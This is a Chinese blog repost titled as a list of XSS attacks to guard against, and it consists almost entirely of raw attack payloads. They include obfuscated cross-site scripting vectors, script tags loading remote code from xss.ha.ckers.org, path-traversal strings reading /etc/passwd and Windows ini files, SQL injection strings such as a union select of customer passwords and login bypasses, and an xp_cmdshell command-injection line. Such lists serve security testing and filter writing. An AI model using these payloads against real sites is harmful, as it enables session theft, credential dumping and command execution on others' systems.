zoukankan
html css js c++ java
需要防范的XSS攻击
>
<
script
>
alert(document.cookie)
</
script
>
='>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(vulnerable)
</
script
>
%3Cscript%3Ealert('XSS')%3C/script%3E
<
script
>
alert('XSS')
</
script
>
<
img
src
="javascript:alert('XSS')"
>
%0a%0a
<
script
>
alert(\
"
Vulnerable\
"
)
</
script
>
.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<
script
>
alert('Vulnerable');
</
script
>
<
script
>
alert('Vulnerable')
</
script
>
?sql_debug=1
a%5c.aspx
a.jsp/
<
script
>
alert('Vulnerable')
</
script
>
a/
a?
<
script
>
alert('Vulnerable')
</
script
>
">
<
script
>
alert('Vulnerable')
</
script
>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E
&SESSION_ID
={SESSION_ID}
&SESSION_ID
=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"
<
XSS
>
=&{()}
<
IMG
SRC
="javascript:alert('XSS');"
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert("XSS")
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
"
<
IMG
SRC
=java\0script:alert(\"XSS\")
>
";' > out
<
IMG
SRC
=" javascript:alert('XSS');"
>
<
SCRIPT
>
a
=/
XSS
/
alert(a.source)
</
SCRIPT
>
<
BODY
BACKGROUND
="javascript:alert('XSS')"
>
<
BODY
ONLOAD
=alert('XSS')
>
<
IMG
DYNSRC
="javascript:alert('XSS')"
>
<
IMG
LOWSRC
="javascript:alert('XSS')"
>
<
BGSOUND
SRC
="javascript:alert('XSS');"
>
<
br
size
="&{alert('XSS')}"
>
<
LAYER
SRC
="http://xss.ha.ckers.org/a.js"
></
layer
>
<
LINK
REL
="stylesheet"
HREF
="javascript:alert('XSS');"
>
<
IMG
SRC
='vbscript:msgbox("XSS")'
>
<
IMG
SRC
="mocha:[code]"
>
<
IMG
SRC
="livescript:[code]"
>
<
META
HTTP-EQUIV
="refresh"
CONTENT
="0;url=javascript:alert('XSS');"
>
<
IFRAME
SRC
=javascript:alert('XSS')
></
IFRAME
>
<
FRAMESET
><
FRAME
SRC
=javascript:alert('XSS')
></
FRAME
></
FRAMESET
>
<
TABLE
BACKGROUND
="javascript:alert('XSS')"
>
<
DIV
STYLE
="background-image: url(javascript:alert('XSS'))"
>
<
DIV
STYLE
="behaviour: url('http://www.how-to-hack.org/exploit.html');"
>
<
DIV
STYLE
=" expression(alert('XSS'));"
>
<
STYLE
>
@im\port'\ja\vasc\ript:alert("XSS")';
</
STYLE
>
<
IMG
STYLE
='xss:expre\ssion(alert("XSS"))'
>
<
STYLE
TYPE
="text/javascript"
>
alert('XSS');
</
STYLE
>
<
STYLE
TYPE
="text/css"
>
.XSS
{
}
{
background-image
:
url("javascript:alert('XSS')")
;
}
</
STYLE
><
A
CLASS
=XSS
></
A
>
<
STYLE
type
="text/css"
>
BODY
{
}
{
background
:
url("javascript:alert('XSS')")
}
</
STYLE
>
<
BASE
HREF
="javascript:alert('XSS');//"
>
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<
XML
SRC
="javascript:alert('XSS');"
>
">
<
BODY
ONLOAD
="a();"
><
SCRIPT
>
function
a()
{alert('XSS');}
</
SCRIPT
><
"
<SCRIPT
SRC
=""
></
SCRIPT
>
<
IMG
SRC
="javascript:alert('XSS')"
<!--#exec cmd
="/bin/echo '<SCRIPT SRC'"
--
>
<!--
#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"
-->
<
IMG
SRC
="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"
>
<
SCRIPT
a
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
a
=">"
'' SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
"a
='
>
'
"
SRC=
"
http:
//
xss.ha.ckers.org/a.js"></SCRIPT>
<
SCRIPT
>
document.write(
"
<SCRI
"
);
</
SCRIPT
>
PT SRC="http://xss.ha.ckers.org/a.js">
</
SCRIPT
>
<
A
HREF
=http://www.gohttp://www.google.com/ogle.com
/>
link
</
A
>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
QQ:273352165 evlon#126.com 转载请注明出处。
查看全文
相关阅读:
java中a++和++a的区别详解
Oracle 对比两张表不一样 的数据
通配符的匹配很全面, 但无法找到元素 'tx:annotation-driven' 的声明
Java语言基础-运算符
java中+=详解 a+=b和a=a+b的区别
java语言基础-变量
java语言基础-进制
Spring整合CXF发布及调用WebService
Oracle Job定时任务的使用详解
MySQL的主从配置
原文地址:https://www.cnblogs.com/evlon/p/849543.html
最新文章
团队作业(四):描述设计
团队作业(三):确定分工
日渐消瘦团队项目(二)——项目选题
日渐消瘦-团队展示
在java中,将String类型字符串s赋值为null后,将字符串与其他字符串拼接后得到结果出现了null字符串与其他字符连接的样式
域内渗透-白银票据及黄金票据的使用
BUUCTF Reverse equation
BUUCTF Reverse luck_guy
BUUCTF Reverse 相册
PentestBox工具自用版本分享
热门文章
group_concat在注入中的优点
CTF中伪造IP的几种方法
PHP eval函数特性
Linux CentOs6.5误卸载自带python和yum后的解决办法
Redis-Sentinel原理及配置详解【转】
WebService通讯技术的CXF框架问题
关于单体测试的事务操作问题
JVM内存回收与爆炸问题
单个团队的领域驱动设计
iOS 真机调试如何安装 WebDriverAgent
Copyright © 2011-2022 走看看